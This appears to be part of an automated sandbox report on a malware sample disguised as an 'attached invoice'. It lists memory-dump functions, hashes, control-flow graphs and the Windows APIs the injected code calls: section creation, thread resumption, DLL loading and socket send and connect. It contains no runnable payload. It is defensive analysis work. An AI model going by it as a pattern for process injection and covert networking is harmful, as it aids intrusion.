                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 523fb489a1d54a6a28d52bc9a1088d2af7ecab275e737e208e6afe0d173a926a
                                                                                                    • Instruction ID: ed16f3aa26c28642a26781ac29ec1826ae3be5b426b7582e383e6a9c507439de
                                                                                                    • Opcode Fuzzy Hash: 523fb489a1d54a6a28d52bc9a1088d2af7ecab275e737e208e6afe0d173a926a
                                                                                                    • Instruction Fuzzy Hash: 4490047134110443D500715C5514F074055D7F1301F51C51DF11D4554DC73DCC537137
                                                                                                    Function 019238D0 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 411c47e4008dc9337879679aae8439c7de1dbf7f736c8585706a55d3cb5f5fae
                                                                                                    • Instruction ID: e91b448ba3a9201ec52b256706317516b0b7324e490f3ba88bdbe196c9e456fd
                                                                                                    • Opcode Fuzzy Hash: 411c47e4008dc9337879679aae8439c7de1dbf7f736c8585706a55d3cb5f5fae
                                                                                                    • Instruction Fuzzy Hash: 1890043134515103D550715C5504717C055F7F0301F51C535F0D445D4DC575CC557333
                                                                                                    Function 01923C90 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: be7210f6ec1b0262d82d7f3c33d7e5a2a1bb314a5a584a98011c514d16280a96
                                                                                                    • Instruction ID: 4d0fd3e91761120d4be54b89d7605c6de637af1411d83fb886bdea33a8eddca1
                                                                                                    • Opcode Fuzzy Hash: be7210f6ec1b0262d82d7f3c33d7e5a2a1bb314a5a584a98011c514d16280a96
                                                                                                    • Instruction Fuzzy Hash: BA90023520110402D91061586904646409697D0301F51D915B0554558DC66488A1B122
                                                                                                    Function 01923C30 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a0b5bd14223c445fc5f4c0c1c1264c0b45092e95c8adcaa4f69dcb578c95a86
                                                                                                    • Instruction ID: 7ac8b5e178159128444450f95d3140c832268f42ea74ef075caee512635f3070
                                                                                                    • Opcode Fuzzy Hash: 2a0b5bd14223c445fc5f4c0c1c1264c0b45092e95c8adcaa4f69dcb578c95a86
                                                                                                    • Instruction Fuzzy Hash: 2D90023120210142994062586904A4E815597E1302B91D919B0145554CC92488616222
                                                                                                    Function 01922B20 Relevance: .0, Instructions: 2COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                    • Instruction ID: 20ad0e485c85e0b0320481cf8e28f0c3ee3bf8531c6343fa89a17e397b4aaeae
                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 01917550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01954530
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01954460
                                                                                                    • Execute=1, xrefs: 0195451E
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01954507
                                                                                                    • ExecuteOptions, xrefs: 019544AB
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01954592
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0195454D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 0-484625025
                                                                                                    • Opcode ID: 785c28ce61e2cd0d27c7fc6871f3784c024b5f2f13b012dfaf529fa0907a488a
                                                                                                    • Instruction ID: eeef16aa0125d92414dd3a41e9d13db293aff4c27dc3db614190cde0adc0c1f5
                                                                                                    • Opcode Fuzzy Hash: 785c28ce61e2cd0d27c7fc6871f3784c024b5f2f13b012dfaf529fa0907a488a
                                                                                                    • Instruction Fuzzy Hash: 79512B31A0021FAAEF15DBD8DC85FAD77ACEF54744F0408A9E50DA7185EB709B81CB61
                                                                                                    Function 018E9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $$@
                                                                                                    • API String ID: 0-1194432280
                                                                                                    • Opcode ID: 33c870b582ebc851eea3912d3f6f7baf9841c224aace18b263dbf911b4122980
                                                                                                    • Instruction ID: 2617f245b903aebf00d89cbf0bab1efb65255c24ab52c45ea71ae5634f78e8b7
                                                                                                    • Opcode Fuzzy Hash: 33c870b582ebc851eea3912d3f6f7baf9841c224aace18b263dbf911b4122980
                                                                                                    • Instruction Fuzzy Hash: E8810A71D002699BDB35CB54CC44BEEBAB8AB48754F0441EAEA0DB7290D7709E84CFA1

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:42
                                                                                                    Total number of Limit Nodes:6
                                                                                                    execution_graph 10361 46d831f 10362 46d8329 10361->10362 10363 46d8428 10362->10363 10365 46d40d6 10362->10365 10367 46d40fc 10365->10367 10366 46d412d SleepEx 10366->10367 10369 46d4140 10366->10369 10367->10366 10367->10369 10368 46d419a NtResumeThread 10368->10369 10369->10368 10370 7c25bf 10372 7c2611 10370->10372 10371 7c2642 connect 10372->10371 10373 7ba598 10374 7ba5b4 10373->10374 10375 7ba64a 10374->10375 10376 7ba5db SleepEx 10374->10376 10378 7b90b8 10374->10378 10376->10374 10379 7b90fd 10378->10379 10380 7b919a 10379->10380 10381 7b9183 SleepEx 10379->10381 10380->10374 10381->10379 10382 7b9948 10383 7b9967 10382->10383 10384 7b99f2 10383->10384 10385 7b99c4 CreateThread 10383->10385 10386 7c2668 10388 7c26a5 10386->10388 10387 7c26d6 closesocket 10388->10387 10389 7c250b 10390 7c2561 10389->10390 10391 7c2592 send 10390->10391 10392 46d3f45 10393 46d3f66 SleepEx 10392->10393 10394 46d3f74 10393->10394 10395 46d3fb6 NtCreateSection 10393->10395 10394->10393 10396 46d3f93 10394->10396 10395->10396 10397 7c3a52 10398 7c39f6 10397->10398 10399 7c3a58 10397->10399 10398->10398 10400 7c3a84 10399->10400 10401 7c3ac0 LdrLoadDll 10399->10401 10401->10400 10402 7c2473 10403 7c244e socket 10402->10403 10404 7c2477 10402->10404

                                                                                                    Executed Functions

                                                                                                    Function 046D3F45 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 142nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816287804528.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45c0000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateSectionSleep
                                                                                                    • String ID: 0$@$@
                                                                                                    • API String ID: 2866269021-3221051908
                                                                                                    • Opcode ID: b266cc4b62e5d0ac704ae6f44b552e640a1fe90f8c9bd9365a2386a55eef69eb
                                                                                                    • Instruction ID: 7304d17f296733a1788aa455ce392630be183cc2841fe65336197281b0fa0954
                                                                                                    • Opcode Fuzzy Hash: b266cc4b62e5d0ac704ae6f44b552e640a1fe90f8c9bd9365a2386a55eef69eb
                                                                                                    • Instruction Fuzzy Hash: E4415B70A28B088FDB58DF58D88569EBBF5FB88704F10062EE94A93250E734E545CB86
                                                                                                    Function 046D40D6 Relevance: 3.1, APIs: 2, Instructions: 79COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 16 46d40d6-46d411c call 46d03f6 call 46e0886 21 46d411e 16->21 22 46d4126-46d412b 16->22 21->22 23 46d412d-46d4137 SleepEx 22->23 24 46d4139-46d413e 23->24 25 46d4161-46d4169 23->25 24->23 26 46d4140-46d4146 24->26 27 46d416b-46d4198 call 46d0486 call 46e0886 25->27 28 46d419a-46d41a7 NtResumeThread 25->28 30 46d4148-46d4149 26->30 27->26 27->28 28->26 29 46d41a9-46d41b4 28->29 29->30 30->25
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816287804528.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45c0000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 1f2c7bf7296825bd6d4490600a6de4245ed8c833593d6e9805891902ab90caa3
                                                                                                    • Instruction ID: 39a1c9ddbe01b358d8aa36a46b6b5623aef0d2c417f8e867fc1f2a2d2c97fe69
                                                                                                    • Opcode Fuzzy Hash: 1f2c7bf7296825bd6d4490600a6de4245ed8c833593d6e9805891902ab90caa3
                                                                                                    • Instruction Fuzzy Hash: A121A130A14A5E4FDB98DF2888942BB7BD1FB58348F00472DD45AC7280FF30D9118B41
                                                                                                    Function 007B90B8 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 35 7b90b8-7b90f7 36 7b90fd-7b9101 35->36 37 7b918b-7b9194 36->37 38 7b9107-7b910a 36->38 37->36 39 7b919a-7b91a3 37->39 38->37 40 7b910c-7b9181 call 7c61a8 call 7c6178 call 7c68e8 38->40 41 7b91df-7b91fc 39->41 42 7b91a5-7b91a9 39->42 40->37 54 7b9183-7b9189 SleepEx 40->54 44 7b91ab-7b91b2 42->44 45 7b91c4-7b91cd 42->45 47 7b91b8-7b91c2 44->47 45->41 48 7b91cf-7b91d6 45->48 47->45 47->47 48->41 50 7b91d8-7b91d9 48->50 50->41 54->37
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: c82542470e893035ff55685a8bad2db84313f57e0b8586e2317f799d3919401b
                                                                                                    • Instruction ID: 0f92a040c6f63f5ef5f8d042d886fb287b07f15d7442188613039f50e7468bdf
                                                                                                    • Opcode Fuzzy Hash: c82542470e893035ff55685a8bad2db84313f57e0b8586e2317f799d3919401b
                                                                                                    • Instruction Fuzzy Hash: 7D31917151CB4C8FCB29DF0CD8C56EA73E0FB85311F40065EEA8A87257EB34A94286D6
                                                                                                    Function 007C3A52 Relevance: 1.6, APIs: 1, Instructions: 99libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 55 7c3a52-7c3a56 56 7c3a58-7c3a82 call 7c6708 55->56 57 7c39f6-7c3a09 call 7c3518 55->57 63 7c3a8f-7c3a9b call 7c9c18 56->63 64 7c3a84-7c3a8e 56->64 65 7c3a0b-7c3a14 57->65 66 7c3a47-7c3a51 57->66 71 7c3a9d-7c3aa4 call 7c9ee8 63->71 72 7c3aa9-7c3abe call 7c5ef8 63->72 68 7c3a18-7c3a25 65->68 68->68 70 7c3a27-7c3a2b 68->70 70->66 74 7c3a2d-7c3a31 70->74 71->72 78 7c3adc-7c3ae4 72->78 79 7c3ac0-7c3ad5 LdrLoadDll 72->79 77 7c3a38-7c3a45 74->77 77->66 77->77 79->78
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 5fb702872d600497e5f8e5facad51c3d4039d1ecc5d555099aea0abe3f2d8e1c
                                                                                                    • Instruction ID: 3b18703cd352adbe84323ebefea7f8fb9037a3e5500962fbe0cbcbda120cc915
                                                                                                    • Opcode Fuzzy Hash: 5fb702872d600497e5f8e5facad51c3d4039d1ecc5d555099aea0abe3f2d8e1c
                                                                                                    • Instruction Fuzzy Hash: 7821083161CB488BDB14EB24C4CCBBAB3D1FBA8305F44866EE48DC6041DA3ED6958741
                                                                                                    Function 007C23CA Relevance: 1.6, APIs: 1, Instructions: 78networkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 80 7c23ca-7c23ce 81 7c23b9-7c23c9 80->81 82 7c23d0-7c2428 call 7bef98 80->82 86 7c242a-7c244b call 7c5788 82->86 87 7c2451-7c2472 socket 82->87 86->87
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: socket
                                                                                                    • String ID:
                                                                                                    • API String ID: 98920635-0
                                                                                                    • Opcode ID: 0160f9b7f85f275e4218b493511977895e64516cb7fe044016260364984dbdf8
                                                                                                    • Instruction ID: 39deec9f5692785b9cb683a84ed2762be0a5f549bde81a073556f874abfe34fa
                                                                                                    • Opcode Fuzzy Hash: 0160f9b7f85f275e4218b493511977895e64516cb7fe044016260364984dbdf8
                                                                                                    • Instruction Fuzzy Hash: 76214F3051CA448FCB48EF1CE0896A6B7E1FB68301F04067EE94DCB25BDB74D9958B96
                                                                                                    Function 007B9943 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 90 7b9943-7b9945 91 7b9921-7b992d 90->91 92 7b9967-7b9970 90->92 91->92 95 7b992f-7b993f 91->95 93 7b9972-7b997d call 7c5fd8 92->93 94 7b9990-7b99bd call 7b52f8 call 7c5788 92->94 93->94 101 7b997f-7b9989 93->101 104 7b99bf-7b99f1 call 7ca0db CreateThread 94->104 105 7b99f2-7b99fc 94->105 101->94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 204ed3e27d091485ec6e3cbf90b59a87ad720546e6f0b9fe369c3626c9a58dce
                                                                                                    • Instruction ID: ae4a13bc93579ba56746b8be4c8f48aae0527565e8e3e1f9167a77bbcdc377aa
                                                                                                    • Opcode Fuzzy Hash: 204ed3e27d091485ec6e3cbf90b59a87ad720546e6f0b9fe369c3626c9a58dce
                                                                                                    • Instruction Fuzzy Hash: BC112B3111CA448FDB88DF28E48A7A6B7D0FB95314F04467ED599CB192EF3AE4828742
                                                                                                    Function 007C250B Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 108 7c250b-7c2569 call 7bf0c8 111 7c256b-7c258c call 7c5788 108->111 112 7c2592-7c25bd send 108->112 111->112
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: send
                                                                                                    • String ID:
                                                                                                    • API String ID: 2809346765-0
                                                                                                    • Opcode ID: abbe141e2c33d6750e3fa04edd18ec5f57c7af5b8965f8b102c03702dffa0e72
                                                                                                    • Instruction ID: db2060faba10d5b2ceeb4d7920a8591e8cd3ce16e686f3811f356622174e5d02
                                                                                                    • Opcode Fuzzy Hash: abbe141e2c33d6750e3fa04edd18ec5f57c7af5b8965f8b102c03702dffa0e72
                                                                                                    • Instruction Fuzzy Hash: A1211F3051CA448FCB59EF189489A5677E1FBA8300F0405BEE84DC725BDB7498558B96
                                                                                                    Function 007C2473 Relevance: 1.6, APIs: 1, Instructions: 71networkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 138 7c2473-7c2475 139 7c244e-7c2472 socket 138->139 140 7c2477-7c247f 138->140 141 7c24a5-7c24c5 call 7bf028 140->141 142 7c2481-7c24a2 140->142 145 7c24ee-7c24f1 141->145 146 7c24c7-7c24e8 call 7c5788 141->146 142->141 149 7c24fa-7c2509 145->149 146->145
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: socket
                                                                                                    • String ID:
                                                                                                    • API String ID: 98920635-0
                                                                                                    • Opcode ID: 79686dfd957fdcf56bb0ae042f19e141827488ff6f2dd3c6a52b97d1487861fc
                                                                                                    • Instruction ID: c9e94b0dccc935e90d7521278bb8a97967d130cf3edb8b28f2182599c18991d8
                                                                                                    • Opcode Fuzzy Hash: 79686dfd957fdcf56bb0ae042f19e141827488ff6f2dd3c6a52b97d1487861fc
                                                                                                    • Instruction Fuzzy Hash: 8721963050C7888FDB94EF288084B9ABBE1FFA8311F44056EE889D7256D634D455C746
                                                                                                    Function 007BA598 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 115 7ba598-7ba5d7 call 7b52f8 call 7c5788 120 7ba64a-7ba659 115->120 121 7ba5d9 115->121 122 7ba5db-7ba5ed SleepEx 121->122 123 7ba5ef-7ba5f6 122->123 124 7ba637-7ba63e 122->124 123->122 126 7ba5f8-7ba609 123->126 124->122 125 7ba640-7ba648 call 7ba518 124->125 125->122 126->122 128 7ba60b-7ba611 126->128 128->122 130 7ba613-7ba615 128->130 130->122 131 7ba617-7ba628 call 7c0b58 call 7b90b8 130->131 135 7ba62d-7ba635 call 7b9208 131->135 135->122
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: ca4627703943177a91a5474a033625cf78bdd2fd46d432b306db316f6f39095d
                                                                                                    • Instruction ID: a260ef9f1ec289a551cc22814c9d0d8451a7b29540ed3a3173af134fe6c59fb8
                                                                                                    • Opcode Fuzzy Hash: ca4627703943177a91a5474a033625cf78bdd2fd46d432b306db316f6f39095d
                                                                                                    • Instruction Fuzzy Hash: AF118E30618B089FCBA5FB2880C9BA973D1FB48700F45067DE99AC7146CE3989918782
                                                                                                    Function 007C25BF Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 150 7c25bf-7c2619 call 7bf158 153 7c261b-7c263c call 7c5788 150->153 154 7c2642-7c2665 connect 150->154 153->154
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: connect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1959786783-0
                                                                                                    • Opcode ID: 82a28c82e0c6822f755013061f54a29a7f7fda6ca5f3186a8a27344f82733e12
                                                                                                    • Instruction ID: dc16c3aba4075032932e743a56c7eeaacac1272bf5f190c49ce24e53cba16b08
                                                                                                    • Opcode Fuzzy Hash: 82a28c82e0c6822f755013061f54a29a7f7fda6ca5f3186a8a27344f82733e12
                                                                                                    • Instruction Fuzzy Hash: 88111F7090CA488FCB58EF18A0896967BE1FB68300F1405AEE84DCB25ADA74C895C796
                                                                                                    Function 007B9948 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 157 7b9948-7b9970 159 7b9972-7b997d call 7c5fd8 157->159 160 7b9990-7b99bd call 7b52f8 call 7c5788 157->160 159->160 165 7b997f-7b9989 159->165 168 7b99bf-7b99f1 call 7ca0db CreateThread 160->168 169 7b99f2-7b99fc 160->169 165->160
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2422867632-0
                                                                                                    • Opcode ID: cf2d9bbed089ef9e5af6be7edaeec47e0efd26030ac6f8f36c7cb1a3da89dfa4
                                                                                                    • Instruction ID: 5657d834d1314c476b16c12ea6510627350ae96c9e273ff52fe6dc2ca105284c
                                                                                                    • Opcode Fuzzy Hash: cf2d9bbed089ef9e5af6be7edaeec47e0efd26030ac6f8f36c7cb1a3da89dfa4
                                                                                                    • Instruction Fuzzy Hash: EC11D670214A088FE784EF28C48D7A6B7E0FB88304F54863DD559CB295DF79D481C752
                                                                                                    Function 007C2668 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 172 7c2668-7c26ad call 7bf1e8 175 7c26af-7c26d0 call 7c5788 172->175 176 7c26d6-7c26e9 closesocket 172->176 175->176
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: closesocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 2781271927-0
                                                                                                    • Opcode ID: 8c92901066adabf54895dd4ad8737981fe93e10fd983c72b76368964cd09d6f7
                                                                                                    • Instruction ID: 7b39012a63d4d6834d914485a63002b29c08c21844eb0640101248ae8b6c6302
                                                                                                    • Opcode Fuzzy Hash: 8c92901066adabf54895dd4ad8737981fe93e10fd983c72b76368964cd09d6f7
                                                                                                    • Instruction Fuzzy Hash: C301DE3051CB48DFDB94EF28D089BAAB7E1FBA8301F440A6EE88DC7255DB3484958756

                                                                                                    Non-executed Functions

                                                                                                    Function 046D05BC Relevance: .2, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816287804528.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45c0000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                                                                    • Instruction ID: bb803bede45575563da5160a331f3a38ee15baac2a672926ff056f9e5f4e7913
                                                                                                    • Opcode Fuzzy Hash: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                                                                    • Instruction Fuzzy Hash: B1412530A0DB494FD328AF69D4816B6B3E2FBD9308F50052DD58AC7352FA71E8428688
                                                                                                    Function 007B54BE Relevance: .2, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.816281337320.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_790000_RAVCpl64.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                                                                    • Instruction ID: 6dc6583ada49be546f46ddd7d530f002ce84d1afd29be7642599507b4ac62373
                                                                                                    • Opcode Fuzzy Hash: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                                                                    • Instruction Fuzzy Hash: DF41F570618F0D8FD728AF6890857BAB3E3FF55301F50462DD98AC3252EB78D8568785

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:0.4%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:15
